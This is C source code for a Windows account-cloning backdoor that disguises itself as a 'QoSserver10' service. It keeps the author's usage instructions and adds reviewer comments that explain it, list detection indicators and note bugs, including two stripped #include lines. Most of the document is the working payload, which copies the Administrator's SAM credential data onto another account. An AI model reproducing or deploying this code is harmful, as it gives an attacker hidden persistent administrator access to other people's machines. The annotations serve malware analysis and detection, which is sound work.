//-------------------------------------------------------------------------
// Usage (author's original instructions, translated):
//   First run "Ex-Service install" from the command line to install the service.
//   Then start the service named QoSserver in the service manager; once started
//   it clones the Guest account into administrator.
//-------------------------------------------------------------------------
// NOTE(review): what this file actually does, for anyone assessing it.
//   * "install" mode registers this executable as an auto-start, own-process
//     Win32 service named "QoSserver10" (the usage text says "QoSserver"; the
//     code consistently uses "QoSserver10").
//   * Service mode does exactly one thing at start: Clone("406"), which copies
//     the REG_BINARY "F" and "V" values of
//     HKLM\SAM\SAM\Domains\Account\Users\000001F4 (RID 0x1F4 = 500, the
//     built-in Administrator) onto HKLM\SAM\SAM\Domains\Account\Users\00000406.
//     Despite the usage text, the key written is the account with RID 0x406,
//     not Guest; which account that is depends on the machine.
//   * The F/V values hold an account's attribute and credential data, so after
//     the copy the target account mirrors Administrator. This is an
//     account-cloning persistence backdoor, not a QoS service. By default only
//     SYSTEM has access to the SAM\SAM subtree, which is why the write is done
//     from a service (a NULL account in CreateService runs it as LocalSystem).
//   Defensive indicators: installation of a service named "QoSserver10" whose
//   binary is not a known QoS component (System log event 7045 / Security
//   event 4697), and any write access to HKLM\SAM\SAM\Domains\Account\Users\*
//   (registry SACL auditing on that subtree). An account whose F/V values are
//   byte-identical to RID 500's is a post-hoc sign that this or a similar tool
//   has run.
//-------------------------------------------------------------------------
// NOTE(review): the two #include targets were lost in extraction (angle-bracket
// header names stripped); as written these two lines do not compile. Given the
// APIs used they were presumably <windows.h> and <stdio.h> -- confirm against
// the original file.
#include
#include

void WINAPI KServiceMain(DWORD argc, LPTSTR * argv);
void InstallService(const char * szServiceName);
int Clone(char *user);

// Entry point. "install" on the command line registers the service and exits;
// any other invocation assumes the process was started by the SCM and hands the
// thread to the service dispatcher.
// NOTE(review): the return value of StartServiceCtrlDispatcher is ignored, so a
// direct launch that the SCM did not initiate just exits with 0.
int main(int argc, char * argv[])
{
    if ((argc==2) && (::strcmp(argv[1], "install")==0))
    {
        InstallService("QoSserver10");
        return 0;
    }
    SERVICE_TABLE_ENTRY service_table_entry[] ={
        { "QoSserver10",   // name of the service's worker thread
          KServiceMain },  // entry point of the service thread
        { NULL, NULL }     // marks the end of the table
    };  // an array of two SERVICE_TABLE_ENTRY structures
    StartServiceCtrlDispatcher(service_table_entry);  // hands this thread to the SCM as the service's main thread
    return 0;
}

// Service status shared by KServiceMain and ServiceCtrlHandler. No
// synchronization; presumably the handler runs on a different thread than
// KServiceMain -- confirm before relying on either field.
SERVICE_STATUS servicestatus;
SERVICE_STATUS_HANDLE servicestatushandle;

// Registers szServiceName with the SCM as an auto-start, own-process service
// whose binary is this executable's own path. Needs SC_MANAGER_ALL_ACCESS, i.e.
// an elevated caller. NULL lpServiceStartName/lpPassword mean the service runs
// as LocalSystem.
// NOTE(review): no error reporting at all -- a failed OpenSCManager or
// CreateService is silently ignored, and CloseServiceHandle is called even when
// the handles are still 0. The binary path is passed unquoted.
void InstallService(const char * szServiceName)
{
    SC_HANDLE hService=0,handle=0;
    handle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (handle!=NULL)
    {
        char szFilename[256];
        GetModuleFileName(NULL, szFilename, 255);  // NULL module = this executable
        hService = CreateService( handle, szServiceName, szServiceName,
                                  SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
                                  SERVICE_AUTO_START, SERVICE_ERROR_IGNORE,
                                  szFilename, NULL, NULL, NULL, NULL, NULL );
    }
    CloseServiceHandle(hService);
    CloseServiceHandle(handle);
}

// SCM control callback. Each case flips dwCurrentState; the single
// SetServiceStatus after the switch reports the settled state.
// NOTE(review): PAUSE/CONTINUE are handled although dwControlsAccepted only
// advertises STOP; SHUTDOWN changes nothing. STOP only *reports* STOPPED --
// KServiceMain does its work synchronously and returns, so there is nothing
// left to cancel.
void WINAPI ServiceCtrlHandler(DWORD dwControl)
{
    switch (dwControl)
    {
    case SERVICE_CONTROL_PAUSE:
        servicestatus.dwCurrentState = SERVICE_PAUSE_PENDING;
        SetServiceStatus(servicestatushandle, &servicestatus);
        servicestatus.dwCurrentState = SERVICE_PAUSED;
        break;
    case SERVICE_CONTROL_CONTINUE:
        servicestatus.dwCurrentState = SERVICE_CONTINUE_PENDING;
        SetServiceStatus(servicestatushandle, &servicestatus);
        servicestatus.dwCurrentState = SERVICE_RUNNING;
        break;
    case SERVICE_CONTROL_STOP:
        servicestatus.dwCurrentState = SERVICE_STOP_PENDING;
        SetServiceStatus(servicestatushandle, &servicestatus);
        servicestatus.dwCurrentState = SERVICE_STOPPED;
        break;
    case SERVICE_CONTROL_SHUTDOWN:
        break;  // no state change on shutdown
    case SERVICE_CONTROL_INTERROGATE:
        servicestatus.dwCurrentState = SERVICE_RUNNING;
        break;
    }
    SetServiceStatus(servicestatushandle, &servicestatus);
}

// ServiceMain for "QoSserver10". Registers the control handler, reports
// START_PENDING, runs Clone("406") synchronously, then reports RUNNING.
// NOTE(review): bInitialized is never set to false, so the STOPPED /
// ERROR_SERVICE_SPECIFIC_ERROR branch is dead code, and Clone's return value is
// ignored -- the service reports RUNNING even when the clone failed. argc/argv
// are unused.
void WINAPI KServiceMain(DWORD argc, LPTSTR * argv)
{
    // register the service control handler
    bool bInitialized = true;
    servicestatushandle =::RegisterServiceCtrlHandler("QoSserver10", ServiceCtrlHandler);
    if (servicestatushandle == (SERVICE_STATUS_HANDLE)0) return;  // cannot report status without a handle
    servicestatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
    servicestatus.dwCurrentState = SERVICE_START_PENDING;
    servicestatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;  // the only control this service accepts is SERVICE_CONTROL_STOP
    servicestatus.dwWin32ExitCode = 0;
    servicestatus.dwServiceSpecificExitCode = 0;
    servicestatus.dwCheckPoint = 0;
    servicestatus.dwWaitHint = 0;
    SetServiceStatus(servicestatushandle, &servicestatus);  // the SCM's record of the service state must be kept up to date
    servicestatus.dwCheckPoint = 0;
    servicestatus.dwWaitHint = 0;
    Clone("406");  // the actual payload: SAM F/V copy onto RID 0x406 (see header)
    if (!bInitialized)
    {
        servicestatus.dwCurrentState = SERVICE_STOPPED;
        servicestatus.dwWin32ExitCode = ERROR_SERVICE_SPECIFIC_ERROR;
        servicestatus.dwServiceSpecificExitCode = 1;
    }
    else
    {
        servicestatus.dwCurrentState = SERVICE_RUNNING;
    }
    SetServiceStatus(servicestatushandle, &servicestatus);
    return;
}

// Copies the "F" and "V" REG_BINARY values of the SAM user key for RID 0x1F4
// (built-in Administrator) onto the SAM user key "00000" + user (user="406"
// -> ...\Users\00000406). Returns 1 on success, 0 on any failure after printing
// a message. This is the privileged, SAM-modifying step described in the header.
// NOTE(review): defects visible here, left as-is in this review:
//   - every early return leaks hkeyRoot/hkeyUser and both malloc'd buffers, and
//     the buffers are never freed on the success path either;
//   - strcat into the 100-byte CloneUserKey has no length check (the only caller
//     passes a 3-character string);
//   - the final "clone FAIL" branch is unreachable: the preceding check already
//     returned on any ret != ERROR_SUCCESS;
//   - a service process normally has no console, so the printf messages are
//     unlikely to be seen by anyone.
int Clone(char *user)
{
    HKEY hkeyRoot,hkeyUser;
    char CloneUserKey[100];
    // sizeF/sizeV are in-out: after RegQueryValueEx they hold the real value
    // sizes, which are then passed unchanged to RegSetValueEx.
    DWORD Type=REG_BINARY,sizeF=1024*2,sizeV=1024*10,ret;
    LPBYTE lpDataF,lpDataV;
    lpDataF = (LPBYTE) malloc(1024*2);
    lpDataV = (LPBYTE) malloc(1024*10);
    ZeroMemory(lpDataF,1024*2);
    ZeroMemory(lpDataV,1024*10);
    ZeroMemory(CloneUserKey,100);
    strcpy(CloneUserKey,"SAM\\SAM\\Domains\\Account\\Users\\00000");
    strcat(CloneUserKey,user);  // destination key: fixed prefix + caller-supplied RID suffix
    // source key: RID 0x1F4 = 500 (built-in Administrator)
    ret= RegOpenKeyEx( HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\000001F4", 0, KEY_ALL_ACCESS, &hkeyRoot);
    if(ret==ERROR_SUCCESS) ;  // empty then-branch; the failure path is the else
    else
    {
        printf("open key FAIL\n\r");
        return 0;
    }
    ret = RegQueryValueEx( hkeyRoot, "F", NULL, &Type, lpDataF, &sizeF );
    if(ret==ERROR_SUCCESS) ;
    else
    {
        printf("Query key FAIL\n\r");
        return 0;
    }
    ret = RegQueryValueEx( hkeyRoot, "V", NULL, &Type, lpDataV, &sizeV );
    if(ret==ERROR_SUCCESS) ;
    else
    {
        printf("Query key FAIL\n\r");
        return 0;
    }
    ret = RegOpenKeyEx( HKEY_LOCAL_MACHINE, CloneUserKey, 0, KEY_ALL_ACCESS, &hkeyUser);
    if(ret==ERROR_SUCCESS) ;
    else
    {
        printf("open key FAIL\n\r");
        return 0;
    }
    ret= RegSetValueEx( hkeyUser, "F", 0, REG_BINARY, lpDataF, sizeF);
    if(ret==ERROR_SUCCESS) ;
    else
    {
        printf("set key FAIL\n\r");
        return 0;
    }
    ret= RegSetValueEx( hkeyUser, "V", 0, REG_BINARY, lpDataV, sizeV);
    if(ret==ERROR_SUCCESS) ;
    else
    {
        printf("set key FAIL\n\r");
        return 0;
    }
    // ret is guaranteed ERROR_SUCCESS here, so the else below never runs
    if(ret==ERROR_SUCCESS) printf("clone SUCCESS\n\r");
    else
    {
        printf("clone FAIL\n\r");
        return 0;
    }
    RegCloseKey(hkeyRoot);
    RegCloseKey(hkeyUser);
    return 1;
}